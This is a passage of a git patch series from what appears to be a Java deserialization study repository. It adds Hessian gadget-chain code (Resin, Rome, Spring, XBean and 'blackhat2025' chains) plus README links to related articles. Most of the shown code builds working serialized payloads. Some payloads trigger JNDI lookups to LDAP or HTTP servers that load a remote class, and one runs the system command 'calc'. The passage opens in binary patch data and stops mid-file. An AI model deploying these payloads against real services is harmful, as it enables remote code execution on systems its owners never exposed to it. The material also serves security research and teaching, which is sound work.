zS*;-8=-xPQE01Q{C84sPwzKppUSsrC{iGL5UF?}FDbsNzbHQGADI8M>kaEUa+MHPj zVm9iMvmluv%x@2wY>y{0SuNdppt^$NUG=Z9oJX^|(pi+%m6Ec`HYe6r`ZR4@t{K?N z8@>&Nb~I^Ob{IPGYdl}RAm5OgF0EY;Bb!rFw$_=zZ`wh0UEsm2A3gGrk|-AWPckWERqOW7eIgYY=Eu^$Kdc`5($;1>=mTn(Nc=2P(5KlVDr zO>X+|cCH$qz#y4*Jj9)zFyS2(0QZmJQRHF;kMo?9w2p8gW_~yp+?QOYf>QJ`yfeNR zID(@zGfrXY(*%xjH_%50@G7zLuGGqG%+$lmk=V)@HAsQPy>2VV@pv2zdk&LS*KKbo z7u!2d@hAAN;>1R3`d;QI@*s6RvyQ$ta>aZb{inu?h1?rZ+EA+p1$P5&XmcsUV8Wnp zFpL$4((U}gLn-fg{_y6uKb5e0GqtOI1-PFC#?7#SZZyuno~?pVjpHg*+DZR~yp#gZm@N?N|Sr*;Fw@_2WA z+{?AUG*Bz4ZQN75H*2}1Cdz-0eT(bZU((umTO0Sij{A!bwDDjY2c*&SiDWsAq@ZSyPSQM8q#^OlqdDz2s3o*A9J5eNbM+n$$#Kd+?VF%_(UBoW4&a|Ci&2btc@jr+L~bPT(Y-q-XoZ5xg5S1kjY&fmzaWm=}Y14{3QU()Cl^_0yMspvv0< zJ^C}|xKrp)o4(EvQ|o-qpT-&D=@wqadvTWiRimB9kbjdd4k}ns@RWjc8*8#jDCZTt WkFEG7f6FmZ3PYz~7r5`k#eV}v%ggit literal 0 HcmV?d00001 diff --git a/shiro/shiroDeser/loadClass.class b/shiro/shiroDeser/loadClass.class new file mode 100644 index 0000000000000000000000000000000000000000..9e3e14363020ea5f3b60741026dbee9afc32d610 GIT binary patch literal 2848 zcmbtWS##4?6#j0!$Po$<6Ch?Ow1w6Q1hIrrVoJ#Z#l=Y|cA+NS6#2#$$dZxdU}&LR z+R&NyZ?w2v>3-#R^4R%{vE37vXI*44S^eD|F1EYhEU|Mm>PIDU|^A5$`> zF(dwF6Syehl8kq8SwR*d@-eEoWGKzFuA8 zPC;8TNs`Rjx@KP2978+@!l+j&hOwSt|8_KmPG%<=rvJYa4D!W>&TGOkS3-&5=l{k-PtU_Nl)S1sTbP?_ z7;ctW)I8hCY-;o}+@0POrPt9d@=h^KZEC)m6AX!Sx*61@NXc=A-ML%Zil$Q0lvTgV za#U`VY=*wYX;GS;?Y!q0R+)B$>3HjQnqf~!#o@~)*FANPdlkDBs7^2phIBS+S)iO@ z*csYtXO=7n@}8#Op3`c6KTvB?=JR&l(fK7qG|kp_UmO!IDtHA4Bya`GC@ZMIAn3eN zt(iP4nn9F|?HuzO9>ezMW0G)7!EKllstPRF0<6Zs1{k2=4jfv`5?loy?n-DVxQF|M z-@yq{M?G8O%hcn(jQagKEeW41_yUs(9^j#bFBN=+ue+RDSh__dD);<`qBGT{9@-+C7AKZrtIJds>Q&9F(9nz! z5J9Td9JQH%NOCF}F-F>axC*+YOj>6WpT$R zOgOu5gU68Vp+K1e9`?(t#~!`NNS0SkcTnUsx7lWW(5j z$HYP0uvYBbl&iC02V4C}Z_rMVfhdd;h^YN7em85mo<^x<=q~oQ(zY56Q_r7q)I>VR ztJp{1DdHCe6T^)D57N^qy3-g!Z1f4(V_Ni)Dj?Gx7$D`Xc#T#{O9`*z5Ir#*#v7z@ zkk;?e6%n$IaokrP^bHTTHUmRp`X1FlTIr7Oe~rh{sV)P@l?Et)Qw+|xH8(r-p4*Ot5~D&yojHO2}%MmOs=Ld zMAH4(OC0UP1g#2`$D0(;LrTOdQL#oAkBFWhDM=z}*N`B)2RKPt23gmL`*Av9Kgz`Y zX(DNizA#l Date: Sun, 23 Nov 2025 13:50:14 +0800 Subject: [PATCH 13/16] update: Hessian --- README.md | 33 ++- hessian/.gitignore | 38 ++++ hessian/.idea/.gitignore | 8 + hessian/.idea/encodings.xml | 7 + hessian/.idea/misc.xml | 14 ++ hessian/.idea/uiDesigner.xml | 124 +++++++++++ hessian/.idea/vcs.xml | 6 + hessian/Hessian.bin | Bin 0 -> 8192 bytes hessian/pom.xml | 81 +++++++ .../src/main/java/com/test/HessianTest.java | 52 +++++ .../java/com/test/client/HessianClient.java | 15 ++ .../java/com/test/gadget/ResinGadget.java | 58 +++++ .../main/java/com/test/gadget/RomeBased.java | 71 +++++++ .../java/com/test/gadget/SpringBased.java | 82 +++++++ .../java/com/test/gadget/XBeanGadget.java | 38 ++++ .../AudioFileFormat2toString.java | 54 +++++ .../ConcurrentHashMap2equals.java | 59 ++++++ .../blackhat2025/XStringFSB2toString.java | 92 ++++++++ .../src/main/java/com/test/gadget/tmp.java | 156 ++++++++++++++ .../src/main/java/com/test/gadget/tmp1.java | 27 +++ .../test/gadget/toStringBased/BCELClass.java | 10 + .../toStringBased/HashTableEquals_get.java | 37 ++++ .../MimeTypeParameterList_MethodUtil.java | 36 ++++ ...eParameterList_ProxyLazyValue_Sysload.java | 57 +++++ .../test/gadget/toStringBased/PKCS9_BCEL.java | 38 ++++ .../src/main/java/com/test/pojo/Person.java | 29 +++ .../com/test/server/HessianServiceImpl.java | 13 ++ .../main/java/com/test/server/Service.java | 5 + hessian/src/main/java/tools/ClassByteGen.java | 29 +++ hessian/src/main/java/tools/HessianTools.java | 66 ++++++ hessian/src/main/java/tools/IOTools.java | 12 ++ .../java/tools/InvocationHandlerImpl.java | 19 ++ hessian/src/main/java/tools/Payload.java | 10 + hessian/src/main/java/tools/ReflectTools.java | 200 ++++++++++++++++++ hessian/src/main/java/tools/TemplatesGen.java | 34 +++ hessian/src/main/java/tools/UnsafeTools.java | 15 ++ .../java/tools/sinkClass/ToStringClass.java | 15 ++ 37 files changed, 1635 insertions(+), 5 deletions(-) create mode 100644 hessian/.gitignore create mode 100644 hessian/.idea/.gitignore create mode 100644 hessian/.idea/encodings.xml create mode 100644 hessian/.idea/misc.xml create mode 100644 hessian/.idea/uiDesigner.xml create mode 100644 hessian/.idea/vcs.xml create mode 100644 hessian/Hessian.bin create mode 100644 hessian/pom.xml create mode 100644 hessian/src/main/java/com/test/HessianTest.java create mode 100644 hessian/src/main/java/com/test/client/HessianClient.java create mode 100644 hessian/src/main/java/com/test/gadget/ResinGadget.java create mode 100644 hessian/src/main/java/com/test/gadget/RomeBased.java create mode 100644 hessian/src/main/java/com/test/gadget/SpringBased.java create mode 100644 hessian/src/main/java/com/test/gadget/XBeanGadget.java create mode 100644 hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java create mode 100644 hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java create mode 100644 hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java create mode 100644 hessian/src/main/java/com/test/gadget/tmp.java create mode 100644 hessian/src/main/java/com/test/gadget/tmp1.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java create mode 100644 hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java create mode 100644 hessian/src/main/java/com/test/pojo/Person.java create mode 100644 hessian/src/main/java/com/test/server/HessianServiceImpl.java create mode 100644 hessian/src/main/java/com/test/server/Service.java create mode 100644 hessian/src/main/java/tools/ClassByteGen.java create mode 100644 hessian/src/main/java/tools/HessianTools.java create mode 100644 hessian/src/main/java/tools/IOTools.java create mode 100644 hessian/src/main/java/tools/InvocationHandlerImpl.java create mode 100644 hessian/src/main/java/tools/Payload.java create mode 100644 hessian/src/main/java/tools/ReflectTools.java create mode 100644 hessian/src/main/java/tools/TemplatesGen.java create mode 100644 hessian/src/main/java/tools/UnsafeTools.java create mode 100644 hessian/src/main/java/tools/sinkClass/ToStringClass.java diff --git a/README.md b/README.md index 190e49d..2fa4a02 100644 --- a/README.md +++ b/README.md @@ -16,6 +16,7 @@ - [高版本jdk下的链子](#高版本jdk下的链子) - [表达式+SSTI](#表达式+SSTI) - [RASP](#RASP) +- [中间件相关](#中间件相关) - [Spring系列](#Spring系列) - [工具开发/二开](#devTools) - [代码审计](#CodeAudit) @@ -96,9 +97,7 @@ ### XXE -[XXE外部实体注入漏洞的测试和修复——Java_xxe漏洞的两种修复方法-CSDN博客](https://blog.csdn.net/jian876601394/article/details/107610681) 列举了很多漏洞函数 - -[Java XXE漏洞原理研究 - 郑瀚 - 博客园](https://www.cnblogs.com/LittleHann/p/17776458.html) +[XXE整理 | 1diot9's Blog](https://1diot9.github.io/2025/11/18/XXE整理/) 参考的文章记得看 [一篇文章带你深入理解漏洞之 XXE 漏洞-先知社区](https://xz.aliyun.com/news/2994) 虽然不针对Java,但是写的很完整 @@ -106,6 +105,8 @@ + +
# 代码 / jar包调试 @@ -156,13 +157,35 @@ CC链是Java反序列化的开始,每个人都应该好好学习。 [java反序列化漏洞commons-collections3.2.1TransformedList触发transform-先知社区](https://xz.aliyun.com/news/13748) +[老链新看——CommonsCollections链](https://mp.weixin.qq.com/s/zNsTKVumW-wa91Eb63WVZA) +
## hessian -[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) +[Hessian反序列化原理到武器化利用 - FreeBuf网络安全行业门户](https://www.freebuf.com/articles/web/424308.html) 简要原理+常规链子 + +[超详细解析Hessian利用链-先知社区](https://xz.aliyun.com/news/13039) 常规链子 + +[漏洞篇 - Hessian 反序列化详解 - 妙尽璇机](https://changeyourway.github.io/2025/02/20/Java 安全/漏洞篇-Hessian反序列化/) 常规链子 + +[Java安全学习——Hessian反序列化漏洞 - 枫のBlog](https://goodapple.top/archives/1193) 原理+Apache Dubbo + +[0CTF/TCTF 2022 hessian-onlyJdk | Bmth's blog](http://www.bmth666.cn/2023/02/07/0CTF-TCTF-2022-hessian-onlyJdk/index.html) only-jdk链 + +[0ctf2022 hessian-only-jdk writeup jdk原生链-先知社区](https://xz.aliyun.com/news/11178) tabby挖掘 + +[Hessian 反序列化新链分析与坑点 | zoiltin's Blog](https://zoiltin.github.io/posts/hessian反序列化新链分析与坑点/) 新链 + +[从2025blackhat-jdd hessian反序列化jdk原生新链开始学习链子构造-先知社区](https://xz.aliyun.com/news/18935) 新链 + +[Hessian反序列化流程及漏洞浅析-先知社区](https://xz.aliyun.com/news/17603) + +[基础篇 - Hessian 协议详解 - 妙尽璇机](https://changeyourway.github.io/2024/11/13/Java 安全/基础篇-Hessian协议详解/) + +[Hessian 反序列化漏洞 · 攻击Java Web应用-Java Web安全\]](https://www.javasec.org/java-vuls/Hessian.html) -[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/) +[Hessian 反序列化知一二 | 素十八](https://su18.org/post/hessian/)
diff --git a/hessian/.gitignore b/hessian/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/hessian/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/hessian/.idea/.gitignore b/hessian/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/hessian/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/hessian/.idea/encodings.xml b/hessian/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/hessian/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/misc.xml b/hessian/.idea/misc.xml new file mode 100644 index 0000000..8345e46 --- /dev/null +++ b/hessian/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/uiDesigner.xml b/hessian/.idea/uiDesigner.xml new file mode 100644 index 0000000..2b63946 --- /dev/null +++ b/hessian/.idea/uiDesigner.xml @@ -0,0 +1,124 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/hessian/.idea/vcs.xml b/hessian/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/hessian/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/hessian/Hessian.bin b/hessian/Hessian.bin new file mode 100644 index 0000000000000000000000000000000000000000..70bb29ef86ff940f9a0d2647ade6c5c3b007410c GIT binary patch literal 8192 zcmeIu%}&EG3JtJZaYr3xpzzm#ZD-!=U){PEvxwRI67QJX{*kCmLXv}^jvx#Eq;D& zCi96KvCkSIB&j;>qZN5XKmYKmYKmY MKm + + 4.0.0 + + com.rois + Hessian + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.javassist + javassist + 3.30.2-GA + + + com.caucho + hessian + 4.0.60 + + + com.caucho + resin + 4.0.63 + + + org.apache.xbean + xbean-naming + 4.24 + + + javax.servlet + javax.servlet-api + 4.0.1 + + + javax.annotation + javax.annotation-api + 1.3.2 + + + + rome + rome + 1.0 + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + + + + + + + + + org.aspectj + aspectjweaver + 1.9.22.1 + + + com.alibaba + fastjson + 1.2.47 + + + + \ No newline at end of file diff --git a/hessian/src/main/java/com/test/HessianTest.java b/hessian/src/main/java/com/test/HessianTest.java new file mode 100644 index 0000000..13a6f04 --- /dev/null +++ b/hessian/src/main/java/com/test/HessianTest.java @@ -0,0 +1,52 @@ +package com.test; + +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.HessianInput; +import com.caucho.hessian.io.HessianOutput; +import com.test.pojo.Person; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; + +public class HessianTest { + public static void main(String[] args) throws IOException { + Person baka = new Person(1, "baka"); + byte[] bytes = hessianSer2bytes(baka); + Person deser = (Person) hessianDeser(bytes); + System.out.println(deser.getName()); + } + + public static byte[] hessian2Ser2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + Hessian2Output hessian2Output = new Hessian2Output(baos); + hessian2Output.writeObject(obj); + hessian2Output.close(); + return baos.toByteArray(); + } + + public static Object hessian2Deser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + Hessian2Input hessian2Input = new Hessian2Input(bais); + Object o = hessian2Input.readObject(); + hessian2Input.close(); + return o; + } + + public static byte[] hessianSer2bytes(Object obj) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + HessianOutput hessianOutput = new HessianOutput(baos); + hessianOutput.writeObject(obj); + hessianOutput.close(); + return baos.toByteArray(); + } + + public static Object hessianDeser(byte[] bytes) throws IOException { + ByteArrayInputStream bais = new ByteArrayInputStream(bytes); + HessianInput hessianInput = new HessianInput(bais); + Object o = hessianInput.readObject(); + hessianInput.close(); + return o; + } +} diff --git a/hessian/src/main/java/com/test/client/HessianClient.java b/hessian/src/main/java/com/test/client/HessianClient.java new file mode 100644 index 0000000..c098b17 --- /dev/null +++ b/hessian/src/main/java/com/test/client/HessianClient.java @@ -0,0 +1,15 @@ +package com.test.client; + +import com.caucho.hessian.client.HessianProxyFactory; +import com.test.server.Service; + +import java.net.MalformedURLException; + +public class HessianClient { + public static void main(String[] args) throws MalformedURLException { + String url="http://localhost:8080/MyTomcat/hessian"; + HessianProxyFactory factory=new HessianProxyFactory(); + Service service=(Service) factory.create(Service.class, url); + System.out.println(service.getCurrentTime()); + } +} diff --git a/hessian/src/main/java/com/test/gadget/ResinGadget.java b/hessian/src/main/java/com/test/gadget/ResinGadget.java new file mode 100644 index 0000000..1017b51 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/ResinGadget.java @@ -0,0 +1,58 @@ +package com.test.gadget; + +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.caucho.naming.QName; +import com.sun.org.apache.xpath.internal.objects.XString; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.naming.CannotProceedException; +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.util.HashMap; +import java.util.Hashtable; + +import static com.test.gadget.blackhat2025.XStringFSB2toString.unhash; + +public class ResinGadget { + public static void main(String[] args) throws Exception { + Object object = getObject(); + byte[] bytes = HessianTools.hessian2Ser2bytes(object); + HessianTools.hessian2Deser(bytes); + } + + public static Object getObject() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + + Object cannotProceedException = Class.forName("javax.naming.CannotProceedException").getDeclaredConstructor().newInstance(); + ReflectTools.setFieldValue(cannotProceedException, "resolvedObj", ref); + + Class contiC = Class.forName("javax.naming.spi.ContinuationContext"); + Context continuationContext = (Context) UnsafeTools.getObjectByUnsafe(contiC); + ReflectTools.setFieldValue(continuationContext, "cpe", cannotProceedException); + ReflectTools.setFieldValue(continuationContext, "env", new Hashtable()); + + // 创建QName + QName qName = new QName(continuationContext, "aaa", "bbb"); + // 实现hash碰撞 + String str = unhash(qName.hashCode()); + // 创建Xtring + XString xString = new XString(str); + + // 创建HashMap + HashMap finalMap = ReflectTools.makeMap(qName, xString); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/RomeBased.java b/hessian/src/main/java/com/test/gadget/RomeBased.java new file mode 100644 index 0000000..47189a0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/RomeBased.java @@ -0,0 +1,71 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import com.sun.syndication.feed.impl.ToStringBean; +import tools.HessianTools; +import tools.ReflectTools; +import tools.TemplatesGen; + +import javax.xml.transform.Templates; +import java.security.*; +import java.util.HashMap; + +public class RomeBased { + public static void main(String[] args) throws Exception { + rome2SignedObj(); + } + + public static void rome2Jndi() throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/eae633"); + + ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class, jdbcRowSet); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } + + // 二次反序列化 + // 会触发三次,因为ToStringBean.printProperty间接触发两次EqualsBean.hashCode + public static void rome2SignedObj() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/CalcAbs.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + // 初始化 SignedObject 所需的密钥和签名工具 + KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA"); + keyPairGenerator.initialize(1024); + KeyPair keyPair = keyPairGenerator.genKeyPair(); + PrivateKey privateKey = keyPair.getPrivate(); + Signature signingEngine = Signature.getInstance("DSA"); + // 创建 SignedObject 对象,对 map 进行签名 + SignedObject signedObject = new SignedObject(hashMap, privateKey, signingEngine); + + + ToStringBean toStringBean2 = new ToStringBean(SignedObject.class, signedObject); + EqualsBean equalsBean2 = new EqualsBean(ToStringBean.class, toStringBean2); + HashMap hashMap2 = ReflectTools.makeMap(equalsBean2, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap2); + HessianTools.hessianDeser(bytes); + + + } + + + // 失败,因为hessian无法反序列化transit和static变量 + public static void rome2Templates() throws Exception { + Templates templates = TemplatesGen.getTemplates(null, "D:/1tmp/classes/Calc.class"); + ToStringBean toStringBean = new ToStringBean(Templates.class, templates); + EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean); +// equalsBean.hashCode(); + HashMap hashMap = ReflectTools.makeMap(equalsBean, "any"); + + byte[] bytes = HessianTools.hessianSer2bytes(hashMap); + HessianTools.hessianDeser(bytes); + } +} diff --git a/hessian/src/main/java/com/test/gadget/SpringBased.java b/hessian/src/main/java/com/test/gadget/SpringBased.java new file mode 100644 index 0000000..6301a9b --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/SpringBased.java @@ -0,0 +1,82 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.springframework.aop.aspectj.AbstractAspectJAdvice; +import org.springframework.aop.aspectj.AspectJAroundAdvice; +import org.springframework.aop.aspectj.AspectJPointcutAdvisor; +import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory; +import org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor; +import org.springframework.aop.support.DefaultPointcutAdvisor; +import org.springframework.aop.target.HotSwappableTargetSource; +import org.springframework.jndi.support.SimpleJndiBeanFactory; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.HashMap; +import java.util.HashSet; +import java.util.Set; + +public class SpringBased { + public static void main(String[] args) throws Exception { + Object o = pointcutAdvisor(); + byte[] bytes = HessianTools.hessian2Ser2bytes(o); + HessianTools.hessian2Deser(bytes); + } + + public static Object advisorHolder() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add("any"); + + // 直接通过构造方法会提前执行 + BeanFactoryAspectInstanceFactory beanFactoryAspectInstanceFactory = (BeanFactoryAspectInstanceFactory) UnsafeTools.getObjectByUnsafe(BeanFactoryAspectInstanceFactory.class); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFinalField(beanFactoryAspectInstanceFactory, "name", url); + + AbstractAspectJAdvice aspectJAroundAdvice = (AbstractAspectJAdvice) UnsafeTools.getObjectByUnsafe(AspectJAroundAdvice.class); + ReflectTools.setFieldValue(aspectJAroundAdvice, "aspectInstanceFactory", beanFactoryAspectInstanceFactory); + + AspectJPointcutAdvisor aspectJPointcutAdvisor = (AspectJPointcutAdvisor) UnsafeTools.getObjectByUnsafe(AspectJPointcutAdvisor.class); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "advice", aspectJAroundAdvice); + ReflectTools.setFieldValue(aspectJPointcutAdvisor, "order", null); + + Class aClass = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder"); + Object objectByUnsafe = UnsafeTools.getObjectByUnsafe(aClass); + ReflectTools.setFieldValue(objectByUnsafe, "advisor", aspectJPointcutAdvisor); + + Object xString = UnsafeTools.getObjectByUnsafe(XString.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(xString); + HotSwappableTargetSource other = new HotSwappableTargetSource(objectByUnsafe); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + + return hashMap; + } + + public static Object pointcutAdvisor() throws Exception { + String url = "ldap://127.0.0.1:50389/d64c0c"; + SimpleJndiBeanFactory simpleJndiBeanFactory = new SimpleJndiBeanFactory(); + Set set = new HashSet(); + set.add(url); + ReflectTools.setFieldValue(simpleJndiBeanFactory, "shareableResources", set); + + + + Object defaultBeanFactoryPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultBeanFactoryPointcutAdvisor.class); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "beanFactory", simpleJndiBeanFactory); + ReflectTools.setFieldValue(defaultBeanFactoryPointcutAdvisor, "adviceBeanName", url); + + // AbstractPointcutAdvisor的子类,且没实现equals方法的都行, AsyncAnnotationAdvisor\DefaultPointcutAdvisor + Object defaultPointcutAdvisor = UnsafeTools.getObjectByUnsafe(DefaultPointcutAdvisor.class); + HotSwappableTargetSource hotSwappableTargetSource = new HotSwappableTargetSource(defaultPointcutAdvisor); + HotSwappableTargetSource other = new HotSwappableTargetSource(defaultBeanFactoryPointcutAdvisor); + + HashMap hashMap = ReflectTools.makeMap(other, hotSwappableTargetSource); + + return hashMap; + } + +} diff --git a/hessian/src/main/java/com/test/gadget/XBeanGadget.java b/hessian/src/main/java/com/test/gadget/XBeanGadget.java new file mode 100644 index 0000000..58f16a5 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/XBeanGadget.java @@ -0,0 +1,38 @@ +package com.test.gadget; + +import com.sun.org.apache.xpath.internal.objects.XString; +import org.apache.xbean.naming.context.WritableContext; +import org.springframework.aop.target.HotSwappableTargetSource; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.naming.Context; +import javax.naming.NamingException; +import javax.naming.Reference; +import java.util.HashMap; + +public class XBeanGadget { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + String refAddr = "http://127.0.0.1:8000/"; + String refClassName = "Calc"; + + Reference ref = new Reference(refClassName, refClassName, refAddr); + WritableContext writableContext = new WritableContext(); + + // 创建ReadOnlyBinding对象 + String classname = "org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding"; + Object readOnlyBinding = Class.forName(classname).getDeclaredConstructor(String.class, Object.class, Context.class).newInstance("aaa", ref, writableContext); + + XString xString = new XString("any"); + + HashMap finalMap = ReflectTools.makeEqualMap(xString, readOnlyBinding); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java new file mode 100644 index 0000000..6e979b9 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/AudioFileFormat2toString.java @@ -0,0 +1,54 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import javafx.beans.property.IntegerProperty; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; + +public class AudioFileFormat2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + Object type = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + hashMap1.put("1", jsonArray); + hashMap1.put("2", type); + hashMap2.put("1", type); + hashMap2.put("2", jsonArray); + + HashMap finalMap = new HashMap<>(); + finalMap.put(hashMap1, "any"); + finalMap.put(hashMap2, "any"); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java new file mode 100644 index 0000000..6a68d8a --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java @@ -0,0 +1,59 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +public class ConcurrentHashMap2equals { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + 